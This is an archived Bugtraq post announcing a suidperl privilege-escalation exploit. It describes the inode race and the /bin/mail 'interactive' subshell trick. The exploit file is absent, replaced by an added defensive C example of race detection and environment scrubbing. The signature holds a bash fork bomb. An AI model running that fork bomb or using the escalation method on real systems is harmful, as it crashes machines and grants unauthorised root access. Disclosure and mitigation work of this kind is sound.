Date:         Sat, 5 Aug 2000 18:39:22 +0200
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
Subject:      sperl 5.00503 (and newer ;) exploit
To: BUGTRAQ@SECURITYFOCUS.COM

Not much to say (except I feel a little bit stupid posting it) ... This
exploit gives instant root, at least on the RedHat 6.x/7.0 Linux boxes I have
available for tests... And for sure, all other systems are vulnerable as
well - it's just that this code may need some refining / tuning /
minor changes...

Below you'll find a brief description of the vulnerability and the exploit
itself, written by me. Please note - I didn't develop everything by myself; I
got great support from Sebastian Krahmer - see the development history. I
still pray he won't get angry at me (probably he will) - but he should be
listed first any time you're talking about this vulnerability (he made
me think with his findings :P).

I don't know who should be blamed - perl vendors? /bin/mail vendors for
putting in undocumented (at least in the manpage) features? Hmm... I guess it's
nobody's fault ;)

Requires: +s perl; bash, gcc, make, usleep (yup, usleep; it's not
available on every system, but I have no time to rewrite everything in C;
you can grab this code from the RedHat distro or similar) will be good... Don't
mail me if you can't use it - it works.

And now, some reading.

#
#    -- PLEASE READ THESE COMMENTS CAREFULLY BEFORE TRYING ANYTHING --
#
# Wonderful, lovely, world-smashing, exciting perl exploit. It works against
# +s suidperl, exploiting an undocumented /bin/mail feature when perl wants to
# notify root about inode race conditions. Currently, tested under RH Linux.
#
# What's probably most shocking, the buggy code has the following comment inside:
# /* heh, heh */. I guess the author wasn't laughing last.
#
# The development history of this exploit is really funny. I found this condition
# about 4 months ago, but thought it was useless (who wants to notify root?).
# I deleted my test code and didn't leave any notes on it. Then, a month after
# this discovery, Sebastian contacted me. He was working on a perl exploit.
# He told me he didn't know how to cause this condition to happen, but if only
# he realised how it could be done, he'd be able to use an undocumented /bin/mail
# feature - the environment variable 'interactive', which, if set, causes
# /bin/mail to interpret ~! commands (subshell requests) even if stdin is not
# a terminal. And then I understood what I'd done. I spent the next month
# (yes! no kidding!) trying to recall WHAT THE FSCK the condition was. I
# remembered it was trivial, even annoying... And finally, now I'm able to
# reconstruct it.
#
# This exploit tries to fit in a rather short, but reasonable time window in
# order to exploit the bug. I tested it on a fast, not overloaded Linux box, and
# I guess on slow machines it needs tuning. It needs anything setuid
# (/usr/bin/passwd is just fine), a writable working directory and something
# around 4 minutes. The working directory should be mounted without noexec or
# nosuid options (if it is, find something like /var/lib/svgalib etc).
#
# WARNING: On slow machines, it's quite possible this exploit will cause
# heavy load. Please test it when the system is not loaded and not in use
# (e.g. at night).
#
# I'd like to thank Sebastian Krahmer for his help (in fact, HE discovered it
# - I think I can say it without shame), and especially thanks to several of
# my brain cells that survived monitor radiation and made me recall this
# race condition.
#
# Send comments, ideas and flames to <lcamtuf@ids.pl>
# Tested with sperl 5.00503, but should work with any other version as well.
#
# Good luck and don't abuse it.
#

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

[Attachment: xperl.sh]
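Added example, written for this page and not taken from Michal Zalewski's post or from the attached exploit: a C sketch of the two ingredients the comment header describes. `same_inode()` is the kind of check suidperl performed, comparing fstat() of the already-open script descriptor with stat() of the script path; a mismatch is the "inode race condition" the post refers to. `demo_race()` reproduces that mismatch with two ordinary files under /tmp (a rename over the path while the descriptor stays open), and `scrub_env()` shows the mitigation a setuid program needs before exec'ing any helper such as /bin/mail: start from an allowlist instead of the inherited environment, so a variable like `interactive` never reaches the helper. The function names, the allowlist contents and the /tmp path are this example's own assumptions.

```c
/* Example code, not from the original post or from perl's sources. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if path still names the inode behind the already-open fd, 0 if the
 * path has been pointed at a different inode since the open (the race
 * suidperl's check was meant to catch), -1 if either stat fails. */
int same_inode(int fd, const char *path)
{
    struct stat by_fd, by_path;
    if (fstat(fd, &by_fd) != 0 || stat(path, &by_path) != 0)
        return -1;
    return (by_fd.st_dev == by_path.st_dev &&
            by_fd.st_ino == by_path.st_ino) ? 1 : 0;
}

/* Build an environment for a helper from an allowlist (assumed here: PATH
 * and TZ). Everything else in the caller's environment, including the
 * 'interactive' variable the post names, is dropped. out gets at most
 * max-1 entries plus a NULL terminator; returns the number kept. */
int scrub_env(char *const env[], const char *out[], int max)
{
    static const char *const keep[] = { "PATH=", "TZ=", NULL };
    int n = 0;
    for (int i = 0; env[i] != NULL && n < max - 1; i++) {
        for (int k = 0; keep[k] != NULL; k++) {
            if (strncmp(env[i], keep[k], strlen(keep[k])) == 0) {
                out[n++] = env[i];
                break;
            }
        }
    }
    out[n] = NULL;
    return n;
}

/* Reproduce the race on constructed files: open "script.pl", then rename a
 * second file over that path while the descriptor is still open. Returns 1
 * if the check sees a match before the swap and a mismatch after it. */
int demo_race(void)
{
    char dir[64], script[96], other[96];
    snprintf(dir, sizeof dir, "/tmp/inode_demo_%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0 && errno != EEXIST)
        return -1;
    snprintf(script, sizeof script, "%s/script.pl", dir);
    snprintf(other, sizeof other, "%s/other.pl", dir);
    unlink(script);                       /* clear stale files from a prior run */
    unlink(other);

    int fd = open(script, O_WRONLY | O_CREAT | O_EXCL, 0700);
    int fd2 = open(other, O_WRONLY | O_CREAT | O_EXCL, 0700);
    if (fd < 0 || fd2 < 0)
        return -1;
    close(fd2);

    int before = same_inode(fd, script);  /* same inode: 1 */
    int swapped = rename(other, script);  /* the attacker's swap */
    int after = same_inode(fd, script);   /* path now names other.pl: 0 */

    close(fd);
    unlink(script);
    rmdir(dir);
    return (swapped == 0 && before == 1 && after == 0) ? 1 : 0;
}

int main(void)
{
    char *env[] = { "interactive=1", "PATH=/usr/bin:/bin", "IFS= ", NULL };
    const char *clean[8];
    int kept = scrub_env(env, clean, 8);
    printf("race detected: %s\n", demo_race() == 1 ? "yes" : "no");
    printf("env vars passed to helper: %d (%s)\n", kept, kept ? clean[0] : "");
    return 0;
}
```

The safe response to a detected mismatch is to refuse to run the script and record the event through syslog(3) with a fixed format string. Handing a message body and the caller's environment to a mail client from a privileged process, which is what the post describes, is what turned a detection path into a root shell.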